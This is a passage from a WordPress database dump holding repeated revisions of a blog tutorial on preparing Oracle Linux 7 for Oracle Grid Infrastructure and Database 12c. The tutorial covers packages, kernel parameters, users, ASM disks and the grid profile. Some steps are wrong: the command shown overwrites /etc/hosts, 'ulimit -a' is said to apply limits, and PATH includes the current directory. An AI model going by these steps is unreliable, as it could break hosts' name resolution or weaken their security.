wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:35:20','2020-02-02 09:35:20','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(35,2,'2020-02-02 09:36:33','2020-02-02 09:36:33','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:36:33','2020-02-02 09:36:33','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(36,2,'2020-02-02 09:39:44','2020-02-02 09:39:44','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:39:44','2020-02-02 09:39:44','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(37,2,'2020-02-02 09:40:28','2020-02-02 09:40:28','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:40:28','2020-02-02 09:40:28','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(38,2,'2020-02-02 09:42:02','2020-02-02 09:42:02','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 